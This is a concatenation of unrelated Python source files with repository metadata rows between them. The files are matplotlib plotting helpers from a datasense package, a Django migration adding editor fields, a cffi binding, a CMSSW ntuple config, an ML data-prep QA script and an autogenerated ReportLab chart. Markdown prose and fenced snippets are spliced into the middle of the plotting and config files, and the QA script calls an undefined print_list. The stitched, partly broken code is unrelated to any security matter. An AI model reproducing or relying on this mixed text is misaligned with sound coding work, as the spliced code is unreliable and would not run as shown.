linewidth: Optional[int] = 1,
color: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
"""
Parameters
----------
x : Union[List[int], List[float], List[str]],
The x coordinates of the bars.
height : Union[List[int], List[float]],
The height(s) of the bars.
width : Optional[float] = 0.8,
The width of the bars.
figsize : Optional[Tuple[int, int]] = (8, 6),
The figure size width, height (inch).
edgecolor : Optional[str] = '#ffffff',
The hexadecimal color value for the bar edges.
linewidth : Optional[int] = 1,
The bar edges line width (point).
color : Optional[str] = '#0077bb'
The color of the bar faces.
Returns
-------
fig, ax : Tuple[plt.Figure, axes.Axes]
Examples
--------
Example 1
>>> import datasense as ds
>>> x = ['Yes', 'No']
>>> height = [69, 31]
>>> fig, ax = ds.plot_vertical_bars(
>>> x=x,
>>> height=height
>>> )
Example 2
>>> x = ['Yes', 'No']
>>> height = [69, 31]
>>> fig, ax = ds.plot_vertical_bars(
>>> x=x,
>>> height=height,
>>> width=0.4
>>> )
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
ax.bar(
x=x,
height=height,
width=width,
edgecolor=edgecolor,
linewidth=linewidth,
color=color
)
return (fig, ax)
def plot_pie(
x: Union[List[int], List[float]],
labels: Union[List[int], List[float], List[str]],
*,
figsize: Optional[Tuple[int, int]] = (8, 6),
startangle: Optional[float] = 0,
colors: Optional[List[str]] = None,
autopct: Optional[str] = '%1.1f%%'
) -> Tuple[plt.Figure, axes.Axes]:
"""
Parameters
----------
x : Union[List[int], List[float]],
The wedge sizes.
labels : Union[List[int], List[float], List[str]],
The labels of the wedges.
startangle : Optional[float] = 0,
The start angle of the pie, counterclockwise from the x axis.
colors : Optional[List[str]] = None
The color of the wedges.
autopct : Optional[str] = '%1.1f%%'
Label the wedges with their numeric value. If None, no label.
Returns
-------
fig, ax : Tuple[plt.Figure, axes.Axes]
Examples
--------
Example 1
>>> import datasense as ds
>>> x = [69, 31]
>>> labels = ['Yes', 'No']
>>> fig, ax = ds.plot_pie(
>>> x=x,
>>> labels=labels
>>> )
Example 2
>>> x = [69, 31]
>>> labels = ['Yes', 'No']
>>> fig, ax = ds.plot_pie(
>>> x=x,
>>> labels=labels,
>>> startangle=90,
>>> colors=[
>>> '#0077bb', '#33bbee', '#009988', '#ee7733', '#cc3311',
>>> '#ee3377', '#bbbbbb'
>>> ]
>>> )
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
ax.pie(
x=x,
labels=labels,
startangle=startangle,
colors=colors,
autopct=autopct
)
return (fig, ax)
def plot_stacked_bars(
x: Union[List[int], List[float], List[str]],
height1: Union[List[int], List[float]],
label1: Optional[str] = None,
*,
height2: Union[List[int], List[float]] = None,
label2: Optional[str] = None,
height3: Union[List[int], List[float]] = None,
label3: Optional[str] = None,
height4: Union[List[int], List[float]] = None,
label4: Optional[str] = None,
height5: Union[List[int], List[float]] = None,
label5: Optional[str] = None,
height6: Union[List[int], List[float]] = None,
label6: Optional[str] = None,
height7: Union[List[int], List[float]] = None,
label7: Optional[str] = None,
width: Optional[float] = 0.8,
figsize: Optional[Tuple[int, int]] = (8, 6),
color: Optional[List[str]] = [
'#0077bb', '#33bbee', '#009988', '#ee7733', '#cc3311',
'#ee3377', '#bbbbbb'
]
) -> Tuple[plt.Figure, axes.Axes]:
"""
Stacked vertical bar plot of up to seven levels per bar.
Parameters
----------
x : Union[List[int], List[float], List[str]],
The x coordinates of the bars.
height1 : Union[List[int], List[float]],
The height of the level 1 bars.
label1: Optional[str] = None,
The label of the level 1 bars.
height2 : Union[List[int], List[float]],
The height of the level 2 bars.
label2: Optional[str] = None,
The label of the level 2 bars.
height3 : Union[List[int], List[float]],
The height of the level 3 bars.
label3: Optional[str] = None,
The label of the level 3 bars.
height4 : Union[List[int], List[float]],
The height of the level 4 bars.
label4: Optional[str] = None,
The label of the level 4 bars.
height5 : Union[List[int], List[float]],
The height of the level 5 bars.
label5: Optional[str] = None,
The label of the level 5 bars.
height6 : Union[List[int], List[float]],
The height of the level 6 bars.
label6: Optional[str] = None,
The label of the level 6 bars.
height7 : Union[List[int], List[float]],
The height of the level 7 bars.
label7: Optional[str] = None,
The label of the level 7 bars.
width : Optional[float] = 0.8,
The width of the bars.
figsize : Optional[Tuple[int, int]] = (8, 6),
The figure size width, height (inch).
color: Optional[List[str]] = [
'#0077bb', '#33bbee', '#009988', '#ee7733', '#cc3311',
'#ee3377', '#bbbbbb'
]
The color of the bar faces, up to seven levels.
Returns
-------
fig, ax : Tuple[plt.Figure, axes.Axes]
Examples
--------
Example 1
>>> import datasense as ds
>>> x = ['G1', 'G2', 'G3', 'G4', 'G5']
>>> height1 = [20, 35, 30, 35, 27]
>>> label1 = 'A'
>>> width = 0.35
>>> height2 = [25, 32, 34, 20, 25]
>>> label2 = 'B'
>>> fig, ax = ds.plot_stacked_bars(
>>> x=x,
>>> height1=height1,
>>> label1=label1,
>>> height2=height2,
>>> label2=label2
>>> )
>>> fig.legend(frameon=False, loc='upper right')
Example 2
>>> x = ['G1', 'G2', 'G3', 'G4', 'G5']
>>> height1 = [20, 35, 30, 35, 27]
>>> label1 = 'A'
>>> width = 0.35
>>> height2 = [25, 32, 34, 20, 25]
>>> label2 = 'B'
>>> height3 = [30, 34, 23, 27, 32]
>>> label3 = 'C'
>>> height4 = [30, 34, 23, 27, 32]
>>> label4 = 'D'
>>> height5 = [30, 34, 23, 27, 32]
>>> label5 = 'E'
>>> height6 = [30, 34, 23, 27, 32]
>>> label6 = 'F'
>>> height7 = [30, 34, 23, 27, 32]
>>> label7 = 'G'
>>> fig, ax = ds.plot_stacked_bars(
>>> x=x,
>>> height1=height1,
>>> label1=label1,
>>> width=width,
>>> figsize=(9, 6),
>>> height2=height2,
>>> label2=label2,
>>> height3=height3,
>>> label3=label3,
>>> height4=height4,
>>> label4=label4,
>>> height5=height5,
>>> label5=label5,
>>> height6=height6,
>>> label6=label6,
>>> height7=height7,
>>> label7=label7,
>>> )
>>> fig.legend(frameon=False, loc='upper right')
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
ax.bar(
x=x,
height=height1,
label=label1,
width=width,
color=color[0]
)
if label2:
ax.bar(
x=x,
height=height2,
label=label2,
width=width,
bottom=height1,
color=color[1]
)
if label3:
bottom = np.add(
height1, height2
).tolist()
ax.bar(
x=x,
height=height3,
label=label3,
width=width,
bottom=bottom,
color=color[2]
)
if label4:
bottom = np.add(
bottom, height3
).tolist()
ax.bar(
x=x,
height=height4,
label=label4,
width=width,
bottom=bottom,
color=color[3]
)
if label5:
bottom = np.add(
bottom, height4
).tolist()
ax.bar(
x=x,
height=height5,
label=label5,
width=width,
bottom=bottom,
color=color[4]
)
if label6:
bottom = np.add(
bottom, height5
).tolist()
ax.bar(
x=x,
height=height6,
label=label6,
width=width,
bottom=bottom,
color=color[5]
)
if label7:
bottom = np.add(
bottom, height6
).tolist()
ax.bar(
x=x,
height=height7,
label=label7,
width=width,
bottom=bottom,
color=color[6]
)
return (fig, ax)
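Each stacked level sits on the element-wise running total of the levels below it, accumulated with `np.add`. The first accumulation step, shown with a slice of Example 2's data:

```python
import numpy as np

height1 = [20, 35, 30]
height2 = [25, 32, 34]
# Level 3 starts where levels 1 + 2 end, per x position.
bottom = np.add(height1, height2).tolist()
print(bottom)  # [45, 67, 64]
```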
__all__ = (
'plot_scatter_y',
'plot_scatter_x_y',
'plot_line_y',
'plot_line_x_y',
'plot_scatter_scatter_x_y1_y2',
'plot_scatter_scatter_x1_x2_y1_y2',
'plot_scatter_line_x_y1_y2',
'plot_line_line_y1_y2',
'plot_line_line_x_y1_y2',
'plot_line_line_line_x_y1_y2_y3',
'plot_scatterleft_scatterright_x_y1_y2',
'plot_lineleft_lineright_x_y1_y2',
'plot_barleft_lineright_x_y1_y2',
'plot_pareto',
'format_dates',
'probability_plot',
'despine',
'plot_histogram',
'plot_horizontal_bars',
'plot_vertical_bars',
'plot_pie',
'plot_stacked_bars',
)
4f7f74d48a25a234be7f07170389204d1e334d03 | 5,319 | py | Python | usersec/migrations/0005_hpcgroupchangerequest_editor_and_more.py | bihealth/hpc-access | ff606b18b18230af2876a791ca706d3b24addb59 | ["MIT"]
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
(
"usersec",
"0004_remove_hpcgroupcreaterequest_delegate_email_and_more",
),
]
operations = [
migrations.AddField(
model_name="hpcgroupchangerequest",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcgroupchangerequestversion",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcgroupcreaterequest",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcgroupcreaterequestversion",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcgroupdeleterequest",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcgroupdeleterequestversion",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcuserchangerequest",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcuserchangerequestversion",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcusercreaterequest",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcusercreaterequestversion",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcuserdeleterequest",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcuserdeleterequestversion",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
]
4f80022b5ed458f70ccb34509ef4da6f1d2d7c2f | 457 | py | Python | kapitan_helm/helm_binding.py | chrisglass/kapitan-helm-bindings | 05de57d0b75c372d2b50cf245bce3dbc72d96c23 | ["Apache-2.0"]
import _cffi_backend
ffi = _cffi_backend.FFI('kapitan_helm.helm_binding',
_version = 0x2601,
_types = b'\x00\x00\x01\x0D\x00\x00\x0D\x03\x00\x00\x01\x11\x00\x00\x01\x11\x00\x00\x01\x11\x00\x00\x01\x11\x00\x00\x01\x11\x00\x00\x01\x03\x00\x00\x07\x01\x00\x00\x00\x0F\x00\x00\x0E\x0D\x00\x00\x0E\x03\x00\x00\x00\x0F\x00\x00\x02\x01\x00\x00\x00\x01',
_globals = (b'\x00\x00\x0A\x23free',0,b'\x00\x00\x00\x23renderChart',0),
)
8b118801c16cb4610dae59fb109ae183e785ba62 | 1,423 | py | Python | python/Ntuple_cff.py | jjacob/NTupleProduction | 5bd3b925a1cdec8a4e1332357becfaba04b7c1c9 | [
"Apache-2.0"
] | null | null | null | python/Ntuple_cff.py | jjacob/NTupleProduction | 5bd3b925a1cdec8a4e1332357becfaba04b7c1c9 | [
"Apache-2.0"
] | null | null | null | python/Ntuple_cff.py | jjacob/NTupleProduction | 5bd3b925a1cdec8a4e1332357becfaba04b7c1c9 | [
"Apache-2.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
from BristolAnalysis.NTupleTools.BristolNTuple_BeamSpot_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Event_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_CaloJets_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_PFJets_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Electrons_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_MET_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_RecoMET_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_METcorrections_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Muons_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Trigger_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_TriggerObjects_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Vertex_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_GenEventInfo_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_GenParticles_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_GenJets_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_GenMET_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Tracks_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Photons_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Taus_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_GlobalEventVars_cfi import *
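In a CMSSW `_cff` file like this one, the producers pulled in by the `_cfi` imports above are normally chained into a `cms.Sequence`. A hedged config-fragment sketch; the producer labels (`nTupleEvent`, `nTupleElectrons`, `nTupleMuons`) are assumptions, since the real labels are defined inside the individual `_cfi` files, not shown here:

```python
# Hypothetical sequence wiring; the producer labels below are assumed,
# not taken from the actual BristolNTuple cfi files.
nTupleSequence = cms.Sequence(
    nTupleEvent *
    nTupleElectrons *
    nTupleMuons
)
```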
| 61.869565 | 75 | 0.896697 | 146 | 1,423 | 8.465753 | 0.212329 | 0.307443 | 0.485437 | 0.695793 | 0.799353 | 0.799353 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059733 | 1,423 | 22 | 76 | 64.681818 | 0.923767 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8cbb1f6fcedab2346dad20c47d466f58266ed060 | 5,492 | py | Python | tests/MachineLearning_QA.py | SeanBenner/RetroFit | 1417775c2154c2127b3dedaf133f8f21d5f1adfa | [
"MIT"
] | null | null | null | tests/MachineLearning_QA.py | SeanBenner/RetroFit | 1417775c2154c2127b3dedaf133f8f21d5f1adfa | [
"MIT"
] | null | null | null | tests/MachineLearning_QA.py | SeanBenner/RetroFit | 1417775c2154c2127b3dedaf133f8f21d5f1adfa | [
"MIT"
] | null | null | null | ############################################################################################
# ML0_GetModelData Example
############################################################################################
import datatable as dt
from datatable import sort, f, by
import retrofit
from retrofit import FeatureEngineering as fe
from retrofit import MachineLearning as ml
# CatBoost
# Load some data
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
# Create partitioned data sets
DataSets = fe.FE2_AutoDataParition(
data=data,
ArgsList=None,
DateColumnName='CalendarDateColumn',
PartitionType='random',
Ratios=[0.70,0.20,0.10],
ByVariables=None,
Processing='datatable',
InputFrame='datatable',
OutputFrame='datatable')
# Collect partitioned data
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
del DataSets
# Create catboost data sets
DataSets = ml.ML0_GetModelData(
TrainData=TrainData,
ValidationData=ValidationData,
TestData=TestData,
ArgsList=None,
TargetColumnName='Leads',
NumericColumnNames=['XREGS1', 'XREGS2', 'XREGS3'],
CategoricalColumnNames=['MarketingSegments','MarketingSegments2','MarketingSegments3','Label'],
TextColumnNames=None,
WeightColumnName=None,
Threads=-1,
Processing='catboost',
InputFrame='datatable')
# Collect catboost training data
catboost_train = DataSets['train_data']
catboost_validation = DataSets['validation_data']
catboost_test = DataSets['test_data']
# QA: Group Case: Step through function
# TrainData=TrainData
# ValidationData=ValidationData
# TestData=TestData
# ArgsList=None
# TargetColumnName='Leads'
# NumericColumnNames=['XREGS1','XREGS2','XREGS3']
# CategoricalColumnNames=['MarketingSegments', 'MarketingSegments2', 'MarketingSegments3', 'Label']
# TextColumnNames=None
# WeightColumnName=None
# Threads=-1
# Processing='catboost'
# InputFrame='datatable'
# XGBoost
# Load some data
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
# Create partitioned data sets
DataSets = fe.FE2_AutoDataParition(
data=data,
ArgsList=None,
DateColumnName='CalendarDateColumn',
PartitionType='random',
Ratios=[0.70,0.20,0.10],
ByVariables=None,
Processing='datatable',
InputFrame='datatable',
OutputFrame='datatable')
# Collect partitioned data
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
del DataSets
# Create xgboost data sets
DataSets = ml.ML0_GetModelData(
TrainData=TrainData,
ValidationData=ValidationData,
TestData=TestData,
ArgsList=None,
TargetColumnName='Leads',
NumericColumnNames=['XREGS1', 'XREGS2', 'XREGS3'],
CategoricalColumnNames=['MarketingSegments','MarketingSegments2','MarketingSegments3','Label'],
TextColumnNames=None,
WeightColumnName=None,
Threads=-1,
Processing='xgboost',
InputFrame='datatable')
# Collect xgboost training data
xgboost_train = DataSets['train_data']
xgboost_validation = DataSets['validation_data']
xgboost_test = DataSets['test_data']
# QA: Group Case: Step through function
# TrainData=TrainData
# ValidationData=ValidationData
# TestData=TestData
# ArgsList=None
# TargetColumnName='Leads'
# NumericColumnNames=['XREGS1','XREGS2','XREGS3']
# CategoricalColumnNames=['MarketingSegments', 'MarketingSegments2', 'MarketingSegments3', 'Label']
# TextColumnNames=None
# WeightColumnName=None
# Threads=-1
# Processing='xgboost'
# InputFrame='datatable'
# LightGBM
# Load some data
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
# Create partitioned data sets
DataSets = fe.FE2_AutoDataParition(
data=data,
ArgsList=None,
DateColumnName='CalendarDateColumn',
PartitionType='random',
Ratios=[0.70,0.20,0.10],
ByVariables=None,
Processing='datatable',
InputFrame='datatable',
OutputFrame='datatable')
# Collect partitioned data
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
del DataSets
# Create lightgbm data sets
DataSets = ml.ML0_GetModelData(
TrainData=TrainData,
ValidationData=ValidationData,
TestData=TestData,
ArgsList=None,
TargetColumnName='Leads',
NumericColumnNames=['XREGS1', 'XREGS2', 'XREGS3'],
CategoricalColumnNames=['MarketingSegments','MarketingSegments2','MarketingSegments3','Label'],
TextColumnNames=None,
WeightColumnName=None,
Threads=-1,
Processing='lightgbm',
InputFrame='datatable')
# Collect lightgbm training data
lightgbm_train = DataSets['train_data']
lightgbm_validation = DataSets['validation_data']
lightgbm_test = DataSets['test_data']
# QA: Group Case: Step through function
# TrainData=TrainData
# ValidationData=ValidationData
# TestData=TestData
# ArgsList=None
# TargetColumnName='Leads'
# NumericColumnNames=['XREGS1','XREGS2','XREGS3']
# CategoricalColumnNames=['MarketingSegments', 'MarketingSegments2', 'MarketingSegments3', 'Label']
# TextColumnNames=None
# WeightColumnName=None
# Threads=-1
# Processing='lightgbm'
# InputFrame='datatable'
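The three catboost/xgboost/lightgbm blocks above differ only in the `Processing` string and the variable names, so the whole pipeline can be driven by one loop. This is a sketch only, assuming the `fe`/`ml` modules imported at the top of the file; `build_model_data` is not part of the retrofit API:

```python
# Sketch: run the partition + ML0_GetModelData pipeline once per backend.
# fe/ml stand in for the retrofit modules imported at the top of the file.
def build_model_data(fe, ml, data, backends=("catboost", "xgboost", "lightgbm")):
    out = {}
    for proc in backends:
        parts = fe.FE2_AutoDataParition(
            data=data, ArgsList=None, DateColumnName='CalendarDateColumn',
            PartitionType='random', Ratios=[0.70, 0.20, 0.10], ByVariables=None,
            Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
        sets = ml.ML0_GetModelData(
            TrainData=parts['TrainData'], ValidationData=parts['ValidationData'],
            TestData=parts['TestData'], ArgsList=None, TargetColumnName='Leads',
            NumericColumnNames=['XREGS1', 'XREGS2', 'XREGS3'],
            CategoricalColumnNames=['MarketingSegments', 'MarketingSegments2',
                                    'MarketingSegments3', 'Label'],
            TextColumnNames=None, WeightColumnName=None, Threads=-1,
            Processing=proc, InputFrame='datatable')
        out[proc] = {k: sets[k] for k in ('train_data', 'validation_data', 'test_data')}
    return out
```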
############################################################################################
# ML0_Parameters
############################################################################################
# Ftrl
Params = ml.ML0_Parameters(Algorithm='Ftrl', TargetType='regression', TrainMethod='gridtune', Model=None)
print(Params)
print_list(Params)
| 28.455959 | 102 | 0.708667 | 496 | 5,492 | 7.790323 | 0.185484 | 0.02795 | 0.024845 | 0.071429 | 0.834886 | 0.834886 | 0.834886 | 0.834886 | 0.834886 | 0.834886 | 0 | 0.01473 | 0.109978 | 5,492 | 192 | 103 | 28.604167 | 0.775777 | 0.294064 | 0 | 0.80198 | 0 | 0 | 0.234919 | 0.042633 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.049505 | 0 | 0.049505 | 0.019802 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8ce2baf2dae1e9093cb38e99acc82500e614dcfc | 10,135 | py | Python | tests/charts-out/test_graphics_charts_lineplots_sample1b.py | debragail/reportlab-mirror | 1e5814e1313ed50d5abb65487b207711cb4f7595 | [
"BSD-3-Clause"
] | 1 | 2020-05-21T23:34:55.000Z | 2020-05-21T23:34:55.000Z | tests/charts-out/test_graphics_charts_lineplots_sample1b.py | debragail/reportlab-mirror | 1e5814e1313ed50d5abb65487b207711cb4f7595 | [
"BSD-3-Clause"
] | null | null | null | tests/charts-out/test_graphics_charts_lineplots_sample1b.py | debragail/reportlab-mirror | 1e5814e1313ed50d5abb65487b207711cb4f7595 | [
"BSD-3-Clause"
] | null | null | null | #Autogenerated by ReportLab guiedit do not edit
from reportlab.graphics.shapes import _DrawingEditorMixin, Drawing, Group, Rect, Line, String, PolyLine, Circle
from reportlab.lib.colors import Color, CMYKColor, PCMYKColor
class ExplodedDrawing_Drawing(_DrawingEditorMixin,Drawing):
def __init__(self,width=400,height=200,*args,**kw):
Drawing.__init__(self,width,height,*args,**kw)
self.transform = (1,0,0,1,0,0)
self.add(Rect(50,50,300,125,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,50,350,50,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(110,50,110,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(170,50,170,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(200,50,200,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(230,50,230,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(290,50,290,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(350,50,350,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,110,45)
v0.add(String(-6.25,-10,'1.0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,170,45)
v0.add(String(-6.25,-10,'2.0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,200,45)
v0.add(String(-6.25,-10,'2.5',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,230,45)
v0.add(String(-6.25,-10,'3.0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,290,45)
v0.add(String(-6.25,-10,'4.0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,350,45)
v0.add(String(-6.25,-10,'5.0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Line(50,50,50,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,50,45,50,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,67.85714,45,67.85714,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,85.71429,45,85.71429,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,103.5714,45,103.5714,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,121.4286,45,121.4286,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,139.2857,45,139.2857,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,157.1429,45,157.1429,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,175,45,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,50)
v0.add(String(-5,-4,'0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,67.85714)
v0.add(String(-5,-4,'1',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,85.71429)
v0.add(String(-5,-4,'2',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,103.5714)
v0.add(String(-5,-4,'3',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,121.4286)
v0.add(String(-5,-4,'4',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,139.2857)
v0.add(String(-5,-4,'5',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,157.1429)
v0.add(String(-5,-4,'6',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,175)
v0.add(String(-5,-4,'7',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
